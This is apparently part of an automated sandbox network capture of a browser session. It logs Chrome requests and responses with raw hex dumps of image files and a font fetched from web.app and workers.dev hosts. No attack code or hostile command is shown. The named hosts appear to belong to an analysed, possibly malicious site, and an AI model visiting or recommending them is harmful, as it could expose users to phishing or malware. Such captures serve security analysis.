                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 31 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: JFIFExifII*DuckyF1http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 82 80 89 14 19 54 96 54 19 d5 02 ca a0 9e 8c 76 f4 42 53 18 f0 f4 2e 2b 1b 4b a5 28 59 63 51 2f 9f 09 9e 52 d4 6a ed 01 14 b2 c6 77 e9 6b 86 03 3f 0b a5 d4 23 8f 4c 40 a0 b0 53 9e 98 59 51 45 95 98 7d f7 95 53 5c 53 66 97 85 9d 37 11 19 b3 04 80 12 12 1d 2e 96 0a fb 47 9b 88 bb b5 57 0c df d4 cd c3 8e de dc de 78 ea f5 b3 79 d8 f4 5b f8 5c 98 db e9 7c ff 00 6b 44 55 5a a7 2b a2 b9 6b 96 ea 69 84 52 58 a6 ba b0 e6 ba 87 aa fa e1 aa 9b 25 a5 c9 d2 c3 f4 6c 79 0e 27 50 d1 19 b9 ab 08 b1 24 29 14 66 40 51 62 05 0b 37 df 99 2b 77 ab 45 f6 14 3d b2 0a 73 d6 40 02 42 64 d7 dc 95 d1 9b 16 14 ea f4 78 f6 e6 e8 df c9 bc c7 ad b1 5b 1b 79 7a aa 8b f0 66 8d 79 f6 75 36 14 a0 98 ad 7c 99 2c 7e 96 d2 05 80 cd 9a ab 6a cb 44 d5 72 d4 c8 58 33 ab db 36 e9 9b f6 5a c1 e3
                                                                                                                                                                                                                                                                                Data Ascii: TTvBS.+K(YcQ/Rjwk?#L@SYQE}S\Sf7.GWxy[\|kDUZ+kiRX%ly'P$)f@Qb7+wE=s@Bdx[yzfyu6|,~jDrX36Z
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 68 00 ae 84 24 35 dd 92 7b 9b 2a e2 e4 e8 df cd c7 e9 2f 7a b4 52 96 e9 af 45 f5 9c f3 51 60 4a e6 9a 86 a6 46 a7 95 34 3f 42 eb ea 53 36 1c 6a fe 95 e9 a6 8a b5 ea be 4a d2 95 ba c6 b5 ef af 91 9f b5 c0 c3 ec ac af 3d f4 e5 19 4c 99 6e be 85 90 24 89 a7 44 94 e5 4d 5d 6c 18 b2 da 88 4d dd de 9c 8f 24 11 42 d1 66 f7 e6 72 a8 55 ae 85 00 9b 44 dd e8 f1 f2 2f 93 99 41 e8 af cc 5e b9 73 5d d2 ea 45 57 02 14 e6 79 bd e8 aa 26 a1 a5 31 71 e9 35 f4 74 e8 ad 4e 3d 15 9e 97 2a 8e 33 db 7d a9 5d 39 31 5d ab 7e a7 39 8f 3c be 67 b2 6c fc 3e 8c bf 3c 40 b6 c8 cf 04 c8 40 54 ee b9 12 ef 52 b8 38 79 2a 59 26 4e b5 dd 0e 94 cc 54 a5 55 6c d4 86 6e 67 36 9a ba 13 ce 50 66 86 eb ef e2 e2 b7 2b ba 27 63 77 37 46 9c 79 28 7b fa 1d 7b 88 32 70 86 97 cb db b2 b4 68 47 17 26
                                                                                                                                                                                                                                                                                Data Ascii: h$5{*/zREQ`JF4?BS6jJ=Ln$DM]lM$BfrUD/A^s]EWy&1q5tN=*3}]91]~9<gl><@@TR8y*Y&NTUlng6Pf+'cw7Fy({{2phG&
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 18 0e 84 e6 cb 41 33 1b 77 59 2d ba ab eb aa c7 9a 39 a9 bb 45 6b 71 54 df 4d 44 59 15 e6 7a 33 22 d7 31 44 76 76 5f 9e 8c 9d 5d 4f 6b 15 d3 c1 e9 5b a1 83 3f 32 b7 d5 52 73 52 a9 f4 c7 96 f6 7e 7a 35 5c b0 06 ed 2a 42 53 cd e3 45 d3 67 5b 22 ca 45 96 52 f7 25 a8 99 30 49 3b 1a db 64 19 85 f4 0f 42 25 75 ea 4c 87 35 35 5e 65 a4 74 d3 9a 96 b2 33 f4 f7 b8 6d 32 62 df a1 cc 1c 5d a7 5e 95 b6 52 ed 78 68 07 7c cf 6d 3c ca 21 6a aa 23 76 fd c4 e6 e4 e8 d9 a1 12 71 ef e8 d5 21 1c 70 8d 19 5b 88 0f b7 02 7b 6a 7c fd da 49 27 a1 a1 08 54 e7 71 2a 0d 1b f4 63 26 5c 8b f2 5d 36 c5 5c ec b3 33 a2 db 2c 07 67 49 f4 51 57 2f 22 f5 34 cf 2f 56 3a ba 0b 9f 2d 59 90 67 2c b5 ab d3 d1 79 8d ad cc e6 f4 f4 bd d8 38 f4 76 76 c5 71 74 6e b3 99 02 39 9f 5b d7 8b 9a 66 4a c7
                                                                                                                                                                                                                                                                                Data Ascii: A3wY-9EkqTMDYz3"1Dvv_]Ok[?2RsR~z5\*BSEg["ER%0I;dB%uL55^et3m2b]^Rxh|m<!j#vq!p[{j|I'Tq*c&\]6\3,gIQW/"4/V:-Yg,y8vvqtn9[fJ
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 25 39 eb a4 61 84 96 d5 75 b6 cb e1 e5 ea 31 b7 a1 e9 d8 00 7c fc eb f5 74 72 b8 84 37 77 a0 eb 9d f8 18 48 92 40 05 92 40 20 01 ba f7 da 55 04 2a 9a 25 9a 5e 5b 5d 19 93 06 3e b7 17 5e 75 7b df ab ce aa 5e cb f3 72 36 68 a5 da 86 a7 4a 7a 2b a5 86 60 a6 0b da 80 bb 19 32 05 58 56 61 2d 83 3e 7a e8 47 91 88 43 7e c1 d3 8e bd 29 e9 6c 79 89 09 3c 03 77 fa 55 f9 dc c2 ea ec eb b7 35 9c fe 01 13 0c 00 0a 30 00 40 01 d4 e8 cd 68 29 7d c8 a4 c9 27 42 8a a3 1f 23 b1 ca ea e1 be 68 bb af 93 9d a6 13 42 71 6d e8 c5 65 74 bd c7 57 74 b0 f3 25 41 6c a5 4e 25 23 3c b4 53 45 79 dc 89 4a e8 a3 39 60 4e ba f2 1b 75 cd 3c cd 3d 1e 8d ae cd 33 20 7c f7 47 a1 d3 83 80 29 af af b9 06 f2 95 00 12 00 2c 92 00 10 04 6e eb bd 48 2c 3f 54 54 88 55 3a 0b 52 f0 a8 ec f3 7a 9c fb
                                                                                                                                                                                                                                                                                Data Ascii: %9au1|tr7wH@@ U*%^[]>^u{^r6hJz+`2XVa->zGC~)ly<wU50@h)}'B#hBqmetWt%AlN%#<SEyJ9`Nu<=3 |G),nH,?TTU:Rz
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: af d9 62 34 69 74 33 0d 0a ef 9f 3b 68 6a ae 94 7b d1 b9 c6 bd 91 35 67 bc ab 9d 6d 89 9b 8d 00 ae d7 3d 96 65 a8 00 24 d7 75 0e 17 df b1 e6 95 99 4a 6b 54 48 45 70 25 60 aa 5f 5e cb e9 08 09 24 90 24 08 00 0a 57 2b 6c b3 2e f0 90 68 ac 9b 00 9f 1d 13 b2 aa ac bf 71 b5 d2 f6 86 a0 79 81 e8 a1 ee 94 76 4b 1e ac 5a 74 c1 61 15 e4 d6 99 eb b6 9a 38 cd 35 a3 3e 9b ed b7 9b 9c 09 02 5b 7a 00 db cd b2 b9 aa 80 b2 aa ab 42 54 02 03 9b da ba 9b b5 a2 80 48 48 12 00 00 19 d3 6f 01 3a b6 5d 6c 92 0d 15 92 e1 27 8a 79 95 ba 6e b5 7a 56 e5 80 d2 ee cf 0e f4 50 5a 57 50 db 27 0d fa 5d 69 b1 e6 33 e7 d5 5e 2a 28 32 a2 a1 64 df d0 b7 9b 94 00 24 26 ed a8 03 9d 29 c9 53 b5 84 aa 40 95 24 44 c9 06 9c 39 36 ea d6 c4 00 49 20 12 00 00 b8 8d d8 b0 68 db 7d c0 48 d1 50 ce 04
                                                                                                                                                                                                                                                                                Data Ascii: b4it3;hj{5gm=e$uJkTHEp%`_^$$W+l.hqyvKZta85>[zBTHHo:]l'ynzVPZWP']i3^*(2d$&)S@$D96I h}HP
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 21 20 16 c9 2b 4e 2e 46 43 3f 47 aa a5 f5 5a fc fe 8c 53 b2 ba 56 e7 4b 7c ee 2b de 61 df ac 99 3a b6 26 da 33 69 1a 33 6c e2 03 f5 a8 db 9a c4 be bc fa 98 64 c9 48 55 4a 45 e0 88 6f b3 ce 97 a6 9d 3c de f6 80 09 24 60 11 2a 49 7c 0d 9f 28 a7 7d 19 14 db cb b5 ed 70 16 9c fc 10 6d 5d 2b b4 66 d2 04 90 4c 93 00 a8 bc 8c 06 7e 9e eb 65 74 6c c0 ed cd e8 68 cf 97 6d b6 a2 79 9c ba 1e 67 55 1d 1b b0 f4 9c b4 4b 51 74 e1 db c7 1d 7a e8 16 66 d2 fc fb ee 4b 73 e1 b6 b6 ae 84 4a d5 b4 91 b1 b3 f3 86 af 4e 8e a8 c4 00 0e d3 15 23 a0 b5 d4 ed ce c8 7a 7c f2 95 8f 7f 32 24 84 54 a1 72 a8 d7 f5 ed 7c d7 80 00 12 04 52 f7 72 39 e5 1b f5 68 bf 22 5f ba de 63 e9 bf 2e 6e 99 75 56 79 8c 5a 4b 9b 7e 3d fa 79 5d 3b 52 f1 07 1e 82 ac b6 c7 43 2d 53 a6 2d 65 91 0e 6b df 49
                                                                                                                                                                                                                                                                                Data Ascii: ! +N.FC?GZSVK|+a:&3i3ldHUJEo<$`*I|(}pm]+fL~etlhmygUKQtzfKsJN#z|2$Tr|Rr9h"_c.nuVyZK~=y];RC-S-ekI
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 46 64 21 9e c7 69 4c d9 6b 2c 61 ce a5 a9 43 6f 6c ba b8 dc c9 8b 2d 70 56 44 34 5d 9a 6e b5 f1 6b 33 d9 6d 14 b7 43 99 66 cc d4 d9 59 a3 a1 5d ba 69 a7 36 87 7c 7c fd fa 75 22 e3 c5 9a d4 50 50 00 82 00 1f 46 ec d9 52 a6 a8 f4 3a 88 88 85 14 88 d2 2a 42 89 09 2a b3 65 f6 bc 81 10 aa b4 d2 95 c2 03 5f 7d b6 dd e5 08 70 13 bb 6d 38 ef 35 a6 9a 78 d4 ab cc 01 22 c6 9b b2 5b 3a 8c db 72 23 df 45 16 6f e6 3e ba 8a 48 7d ef 19 33 d9 af 55 b6 a6 3d 3c 75 1f 4e 14 52 24 58 09 01 60 2c ec eb ab 96 91 45 71 59 dd d4 0a 10 12 96 58 29 08 a2 40 4c 3b 5a ec 04 24 25 75 54 88 b1 25 b7 5a f7 dd e4 5e 19 44 d1 d6 d3 ce cb 93 5e fb f7 d1 cc 26 2b cd 4c ca ca 9a 1a 87 4e 9e 78 d3 9a 9b 2f 4c 7a b5 f3 27 75 13 5d d7 15 51 1b f7 da 4b 3b 2e 0e 34 17 5f 80 09 15 48 00 80 83
                                                                                                                                                                                                                                                                                Data Ascii: Fd!iLk,aCol-pVD4]nk3mCfY]i6||u"PPFR:*B*e_}pm85x"[:r#Eo>H}3U=<uNR$X`,EqYX)@L;Z$%uT%Z^D^&+LNx/Lz'u]QK;.4_H
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 0a cb 76 66 a0 bc 12 8b ee 98 8a 37 8d 9a f8 c1 4a 1a d2 9c 80 c7 69 39 e4 bc c4 dd 7e 1c da 76 be 65 50 68 52 49 99 0b 1a 48 22 45 14 05 20 00 50 52 08 00 20 ec 68 91 98 73 4b 91 26 28 da c0 b4 54 fa 2c 90 16 2b ce 0c 42 d5 55 75 a6 0c 91 a7 a5 bf 4d be 46 e3 a5 86 97 b4 2b 6d 0b 25 06 9b 1a 72 6c c5 88 e9 6c e4 e4 c6 4c bf 7f 9d 52 3c ca 3b 6b a7 9e fa f5 d1 94 1a 54 59 24 69 2d 99 00 61 45 22 22 08 08 20 14 88 02 02 23 b3 a5 c2 e2 22 db 1e 65 97 35 72 03 de f2 01 02 e7 50 02 56 9c e2 ae 6c 59 a0 b3 44 5f 66 ac 55 bd d3 34 69 b5 09 c3 66 8b 8b 39 bb 39 9d 4b 25 f9 58 32 83 5f d6 c4 aa 38 8e 69 b7 9b 55 fb 27 30 33 d8 eb 09 52 81 63 48 0d 20 b1 02 8a 10 41 00 a4 28 41 00 76 f4 cc d8 e9 0d 32 5f 64 cc 11 0c 41 00 04 44 21 09 20 0b 55 02 24 67 c9 45 6b d2
                                                                                                                                                                                                                                                                                Data Ascii: vf7Ji9~vePhRIH"E PR hsK&(T,+BUuMF+m%rllLR<;kTY$i-aE"" #"e5rPVlYD_fU4if99K%X2_8iU'03RcH A(Av2_dAD! U$gEk
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 5a cb 3d 35 cd 26 b9 e3 5e 96 13 a5 2b 9c 49 6e fa 0c e5 61 33 91 b5 dc 08 cc e9 a0 26 75 39 f4 c4 48 6b 58 48 99 bd 35 9a ad e3 4c 09 1b d6 ec c0 59 22 49 d2 36 a3 2c 3a d0 33 9d cc 74 b9 ce 22 6f 58 24 ab d2 67 1a 5d 24 4b 52 4b d3 52 21 66 66 77 56 4b b5 49 98 de e1 34 cc d8 18 e5 75 58 86 90 dc a4 69 9c 96 98 8e 89 6d b3 9c 0d 58 6b 55 33 22 ea 6a 35 45 41 cd ba c7 34 b7 2d e6 da a5 ae 31 a5 5a 26 37 72 cc 4b d2 64 2e ad cc 20 ae 94 02 50 c7 32 4b 45 28 33 96 ad 6e 84 e5 2c 0e 94 c4 b2 8a 65 54 e9 40 00 9c a3 35 65 4b 56 0c c5 d2 f4 04 f3 c6 f5 6d 29 9c 03 46 69 75 6d 00 00 ce 32 25 4a a2 cc 8b 6e ea 24 e7 32 bb d6 8b 19 ca 2b 44 95 77 40 50 08 b1 18 c9 2a 85 18 b6 ea cb 18 92 49 75 bd 12 64 ab bc a5 83 58 d5 b4 05 20 40 99 ce 75 6c 15 58 9b 28 65 99
                                                                                                                                                                                                                                                                                Data Ascii: Z=5&^+Ina3&u9HkXH5LY"I6,:3t"oX$g]$KRKR!ffwVKI4uXimXkU3"j5EA4-1Z&7rKd. P2KE(3n,eT@5eKVm)Fium2%Jn$2+Dw@P*IudX @ulX(e


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                59192.168.2.649791173.208.137.674433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC434OUTGET /picdir/middle/197-1975093_facebook-instagram-twitter-youtube-google-linkein-twitter-logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.pinclipart.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Server: nginx/1.14.0
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Content-Length: 72247
                                                                                                                                                                                                                                                                                Last-Modified: Sun, 22 Dec 2019 00:35:30 GMT
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                ETag: "5dfeba52-11a37"
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC16124INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 11 08 03 03 03 70 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                                Data Ascii: JFIFCCp"}!1AQa"q2
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC16384INData Raw: af 9e 58 1c 9e 0f 53 d8 fa d0 a4 e4 72 7a 8e e7 d6 be 86 a0 0f 9e 30 7d 0f e4 6b d1 3c 04 08 1a ae 46 39 b2 eb ff 00 6f 75 e8 75 e7 9e 3d 24 0d 2b 07 1c de f4 ff 00 b7 4a 00 f4 3a 2b e7 8c 9f 53 f9 9a 55 27 23 93 d4 77 3e b4 00 30 39 3c 1e a7 b1 f5 a4 c1 f4 3f 91 af a1 e8 a0 0f 3c f0 10 20 6a b9 18 e6 cb af fd bd d7 a1 d7 9e 78 f4 90 34 ac 1c 73 7b d3 fe dd 2b ce f2 7d 4f e6 68 03 e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 0a 4e 47 27 a8 ee 7d 6b e8 6a 00 f9 e3 07 d0 fe 46 bd 13 c0 40 81 aa e4 63 9b 2e bf f6 f7 5e 87 5e 79 e3 d2 40 d2 b0 71 cd ef 4f fb 74 a0 0f 43 a2 be 78 c9 f5 3f 99 a5 52 72 39 3d 47 73 eb 40 03 03 93 c1 ea 7b 1f 5a 4c 1f 43 f9 1a fa 1e 8a 00 f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 79 e7 8f 49 03 4a c1 c7 37 bd 3f ed d2 bc ef 27 d4 fe 66
                                                                                                                                                                                                                                                                                Data Ascii: XSrz0}k<F9ouu=$+J:+SU'#w>09<?< jx4s{+}Ohz=NG'}kjF@c.^^y@qOtCx?Rr9=Gs@{ZLClzyIJ7?'f
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC16384INData Raw: 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a fd 3c ff 00 82 54 f8 2c eb df b4 0e a9 e2 89 22 df 6f e0 cf 08 df dc ab 91 c4 77 9a b4 d0 e9 f6 ee ac 47 0e 23 6b 85 c0 e4 ab 37 41 cd 7e 61 d7 ef c7 fc 12 3b c0 e7 4f f8 6b f1 17 c7 f3 44 03 f8 8b c5 16 de 1f b2 91 97 0f f6 5d 06 c6 3b ab a6 46 c0 cc 72 5c ea 91 a1 39 23 7d b3 0e c6 80 3f 5e 94 9c 8e 4f 51 dc fa d7 d0 d5 f3 c2 f5 1f 51 fc eb e8 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79
                                                                                                                                                                                                                                                                                Data Ascii: (((((((((((((((((((((((((((<T,"owG#k7A~a;OkD];Fr\9#}?^OQQz+<zHV9nu=}oy
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC16384INData Raw: 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79 de 4f a9 fc cd 2a 93 91 c9 ea 3b 9f 5a 6d 2a f5 1f 51 fc e8 03 e8 7a 28 a2 80 3c f3 c7 a4 81 a5 60 e3 9b de 9f f6 e9 5e 77 93 ea 7f 33 5e 89 e3 de 9a 57 d6 f7 f9 5a 57 9d 50 03 94 9c 8e 4f 51 dc fa d7 d0 d5 f3 c2 f5 1f 51 fc eb e8 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79 de 4f a9 fc cd 2a 93 91 c9 ea 3b 9f 5a f3 af 88 ff 00 16 3e 1d fc 23 d0 e6 f1 17 c4 4f 16 69 5e 17 d2 e1 46 65 7b e9 8b 5d 5d 32 82 7c ab 1b 08 16 6b eb e9 db 18 48 6d 6d e5 91 8f 01 7a d7 e2 37 ed 27 ff 00 05 43 f1 5f 8b 96 fb c2 df 02 6d ee bc 1b a1 4b e6 5b cb e3 0b d4 41 e2 6b d8 4e e4 66 d3 a0 06 48 b4 65 90 72 93 6e 96 f5 14 86 47 b7 97 05
                                                                                                                                                                                                                                                                                Data Ascii: z+<zHV9nu=}oyO*;Zm*Qz(<`^w3^WZWPOQQz+<zHV9nu=}oyO*;Z>#Oi^Fe{]]2|kHmmz7'C_mK[AkNfHernG
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC6971INData Raw: 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2 bb af 3b c1 f4 3f 91 af 44 f0 10 20 6a b9 18 e6 cb af fd bd d0 07 a1 d1 45 14 01 f3 c3 75 3f 53 fc e9 29 cc 0e 4f 07 a9 ec 7d 69 30 7d 0f e4 68 03 d1 3c 05 d3 55 fa d9 7f 2b ba f4 3a f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2 bb af 3b c1 f4 3f 91 af 44 f0 10 20 6a b9 18 e6 cb af fd bd d0 07 a1 d1 45 14 01 f3 c3 75 3f 53 fc e9 29 cc 0e 4f 07 a9 ec 7d 69 30 7d 0f e4 68 03 d1 3c 05 d3 55 fa d9 7f 2b ba f4 3a f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2
                                                                                                                                                                                                                                                                                Data Ascii: lzu?Sz=6]5_;?D jEu?S)O}i0}h<U+:lzu?Sz=6]5_;?D jEu?S)O}i0}h<U+:lzu?Sz=6]5_


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                60192.168.2.649793199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC617OUTGET /8ebd43c3b1c36c1acacb5c59bd087da110eb47c7.ttf HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://chattts-49f1.beszyrecala.workers.dev
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                Referer: https://kengegame.web.app/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 97276
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: font/ttf
                                                                                                                                                                                                                                                                                Etag: "0212062544b9b849a23181e82cb2001e65c6731760a3a48b32346d783cf98efc"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740037-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.189720,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 00 01 00 00 00 12 01 00 00 04 00 20 44 53 49 47 00 00 00 01 00 01 7b f4 00 00 00 08 47 44 45 46 33 02 33 ed 00 00 01 2c 00 00 00 e6 47 50 4f 53 1f 78 bd 7c 00 00 02 14 00 00 3c ea 47 53 55 42 57 27 2a 5f 00 00 3f 00 00 00 10 e2 4f 53 2f 32 6b 10 a5 3d 00 00 4f e4 00 00 00 60 63 6d 61 70 10 35 fc ba 00 00 50 44 00 00 0a 1e 63 76 74 20 3a f0 05 9a 00 01 6d a0 00 00 00 98 66 70 67 6d 76 64 7f 7a 00 01 6e 38 00 00 0d 16 67 61 73 70 00 00 00 10 00 01 6d 98 00 00 00 08 67 6c 79 66 b2 96 23 98 00 00 5a 64 00 00 e1 a8 68 65 61 64 0b 8e e2 64 00 01 3c 0c 00 00 00 36 68 68 65 61 07 b6 06 43 00 01 3c 44 00 00 00 24 68 6d 74 78 3c e1 3d c9 00 01 3c 68 00 00 0c 0e 6c 6f 63 61 7c c5 b6 4c 00 01 48 78 00 00 06 18 6d 61 78 70 04 62 0d ec 00 01 4e 90 00 00 00 20 6e 61 6d
                                                                                                                                                                                                                                                                                Data Ascii: DSIG{GDEF33,GPOSx|<GSUBW'*_?OS/2k=O`cmap5PDcvt :mfpgmvdzn8gaspmglyf#Zdheadd<6hheaC<D$hmtx<=<hloca|LHxmaxpbN nam
